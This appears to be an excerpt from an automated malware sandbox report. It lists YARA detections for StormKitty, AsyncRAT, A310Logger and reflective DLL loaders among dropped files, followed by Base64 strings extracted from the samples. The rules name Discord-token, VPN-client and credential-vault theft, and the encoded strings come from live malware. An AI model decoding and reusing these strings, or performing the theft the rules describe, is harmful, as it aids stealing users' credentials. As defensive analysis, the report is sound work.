                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPEDMatched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                      Source: 3CBD.tmp.Installer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: accc.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 53A5.tmp.update.exe.2.dr, tYUuwGWptFEcm.csBase64 encoded string: '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
                      Source: 5E16.tmp.aaa.exe.2.dr, Settings.csBase64 encoded string: 'LAMmkbYim6ZwfzQdAQaLdpnRRRjyBqCCltTOWDNoXMMIalgspm3pyWEVkCRmT5rw0GW39dxj62TpWKzUzE8cdw==', 'yYw23vuccFfwR3P8jZ3MBf0c8qLQRtuAuh2uOrOWW3AKtnDbZNhnUxWFnMIGqymz1SxndenSoeuj8V+uKsbeKg==', 'lTT7RE5mbrzQuIcxXTALgC+B1YGscEYK7jEz095H9+Xo/WyhECOxJ/L2V8p7iUgkiHS5CC3+UilLWxJ1+K083A==', 'SLwTPCaiArk54CVXXqt61RFrKtV2wXrCeonPBA93AMa61r1F7L+XJHQryzwUEA5RnixZDJa5hK3eYSgu8zTAtQ==', 'nKtGTto1gGLF914EXjtgEkdwVcIT7hbMFgKLYBpOhzvopbRxXWe4TAkyuutKTB02G5H8v+ddwPjWHrnlxVpj7z8iKvZBIUQm/frC2FDR3uSRTmnTL0Zlu/LEKg2e8FPTbEDDIF7JiqmTTaA5NXXu8858erF6sGdb+qPO2ShyKnBUlnlQjrsOTKnAWcJFJ018wgGgMclY3DW5nQogT6QAhv1mz9Tq6O9xJSzUgTSNcsBQ0iTa1Wp8Rn5kmuAlj2bvzl2IyvvskSHFx90w8Uq/12WUP4KTUYyTNNRNNfnPF2koUSCkEyj7NMtlDMzRemfmFsfbpGavVJ67/5wxJ1SBiaYXDReYUWP+L7odHO1Ck3SxXAhu84JanXNE65CdjoQFo4+BH/I/fOiOZYYyTwrCF2B4rFdcT244wsYa0S/9UvJ+/8l0+qiYRwrsz2IGHDE5LFDT0fty+X4gv1Co89oPrTCQsdSvFCGDrdkAcb7nKWbaQNleXzVbiieFBPTXFKL6c+SWET0IwoZ+YCXd9rV02Sklgjli5tGYjjjfj6RJ/259Tee57sVlxFB/XFVpu0IFTC2fZgpLWjf72Uleb9qlisf7ctVKExCtyNoZC1jRWxCWfnOKEKiN5DvC1/vZ9nhEITtUCv366bWr38zT1zgXTgRJ3uEMqxWvOu8tLqSvVcbVkmT3bMF24ciaF0VKJtbLVaXELWm4fJq2uj7alykoWAZuW8p2cGxePxjAZL0AXSwiQ4i+c0Wp3UCFeS3SeTO71biPTMVmUr7MvnwJ2Qnkc+7WaSSBdVAelSBNa7roe0Z/oeOJWYq7sI9dbkp0CjNf84jeqTkr792S+yHtwZPmCLOmngWwYZi9EQHJXAmFSr/z2XlUlvfd1+X9CPsVi3gm51SIR+l6hoTEN67NUDo9CRYNdVJT0/YI069WnNc0izQrQhAWPxG92vEl+Whn8xlXmBsbqUnvsbYi2ZU4GLkPFyPp33w2ezAY0FmXjjGbNd5eGkvXHk7PE0ASbdPY4x7ag5maKJdeeai6jrq+d0ZB6fiRdcFmi2TmaDZrTFYq2pXJ6tZCAJHsNCjho6yGg1XT', 'oaHMVGr3Ryr+bRYfmjB3khVuRv0W7S7uadwRjsnNIRXnZfitH5272CHI/Nie7PkfvW41BBbf2d7ViQ7ggAGipnuzUBYuJUuOzaEhFe2sLwqXcUT5eciu3ltp7nPbUYNHRrkMilrhiJxaKo91ZaOWgTSE7xS8rA+4tc8QKW4OLssTVE2/0fh1yqOwgL5ZpujPuDyIYv6B9JilEIsrSCMWfQ38lW1OSbhrzo4JeGcwB+btCf2cF3QASjR5wb75378mLby8DtSS0M2dT3YtlL+MO951BINZSO7OpfPl0IgoZ+I=', 'ovYANo+tvDly7O+U8LEjuagsqr86tuq9Ffomc9MUIV5Cd8Vn0kBnKcu7P/XjCu4tvKUhx+OUec4qRT0GaTqWyg==', 's+h1KYqR5Ua/OwYMzaFWfcue5c5h/g3YpUExI20vVntz3tcqcs617/wSaYpgXHDAZJf71jfNfz6TAWzO7lqSNQ==', 'oBsiOQXJMQ/1DG/J4g/EX+EKI33iAOt4vLo9JdZ9zpZUTAdMpTvsLNd9v2exBDcPt4TPZGUIK2UowGIo8FVl9w=='
                      Source: 3CBD.tmp.Installer.exe.2.dr, vrSIoVmYiYR.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
                      Source: 3CBD.tmp.Installer.exe.2.dr, llelyKwxZfhStIQ.csBase64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
                      Source: 3CBD.tmp.Installer.exe.2.dr, RXCuhMXrVyLpv.csBase64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
                      Source: 3CBD.tmp.Installer.exe.2.dr, HCrlHwiwwszWU.csBase64 encoded string: 'H4sIAAAAAAAEACsNjcosKKpM8/K2zC9yNivPDyl2y8nwdS0KizRMMzevAgB4DFSeIAAAAA==', 'H4sIAAAAAAAEADMzsDAytjA0NTCycnR0dU01TQkrC/ZNcU3TjU/zDs0wzwwqTPYrzTMONHWpqvAFAGbJrNwuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEADM0Tw5wdg8tK/OK9HErcqpKNXSqSo4oKvY1S3dKczX0CYkEADv7vKUiAAAA', 'H4sIAAAAAAAEADM0Tw5wdg8tK/OK9HErcqpKNXSqSo4oKvY1S3dKczX0CYkEADv7vKUiAAAA', 'H4sIAAAAAAAEACssMi+yLDc2Mcgoy6sozMo1Ss4qyDLOTjEoNs9OqzIwyi42LS41yyiqSgUA80+qVCoAAAA=', 'H4sIAAAAAAAEAHMJtUhKco50r8gyTko1jnDxzcws8PVKcXNz90gvd6nycTIFAGsQREkiAAAA', 'H4sIAAAAAAAEAAXBCQEAIAgDwEp8zhlHUDIY3zt5ttFamuRAtN0jsDCmUMsLxKBPrvrTZDt6KgAAAA==', 'H4sIAAAAAAAEAPPJdAnxtiwNyaoM8PMtMsrNd8+MMo2KCEz0KUvLrnQ3jDQHAL4F40AiAAAA', 'H4sIAAAAAAAEADOxLCypKC0rCTD3jgovLaoMD7VIdsp1r6w0z3IqN3E2Tk0L9a5yLgzKdbYo9jZMCsoIrgxxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHD0Lal09PWJjCgMBwD0oyzvXwAAAA==', 'H4sIAAAAAAAEAHN3ijJz8QtxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHAMcvV1j3B3cfR2cjMNDzf1BwCczo9yOAAAAA==', 'H4sIAAAAAAAEACvyS04xNE8OcHYPLSvzivRxK3KqSjV0qkqOKCr2NUt3SnM19AmJBAABckyEJgAAAA==', 'H4sIAAAAAAAEAHP0cnE3jQgNdDEJyA9ONHNzNLEwSfV1C8svcAxxSs2scskCAEnCho0iAAAA', 'H4sIAAAAAAAEAAtxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHAEABQL/CkiAAAA', 'H4sIAAAAAAAEACsxNE8OcHYPLSvzivRxK3KqSjV0qkqOKCr2NUt3SnM19AmJBAA0SDlRIwAAAA==', 'H4sIAAAAAAAEAEvKSzK0MC0rKC0yzkkuybDMMTc3LyotyEquzCgsLyg2KDfNSbcwMi8vMwUATJpbXyoAAAA=', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
                      Source: 3CBD.tmp.Installer.exe.2.dr, CwkOLYwEiqNy.csBase64 encoded string: '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
                      Source: 3CBD.tmp.Installer.exe.2.dr, Dbkufbnkyis.csBase64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
                      Source: 3CBD.tmp.Installer.exe.2.dr, FlkCRXUvHcR.csBase64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
                      Source: 3CBD.tmp.Installer.exe.2.dr, yfwLUpaytDvy.csBase64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='
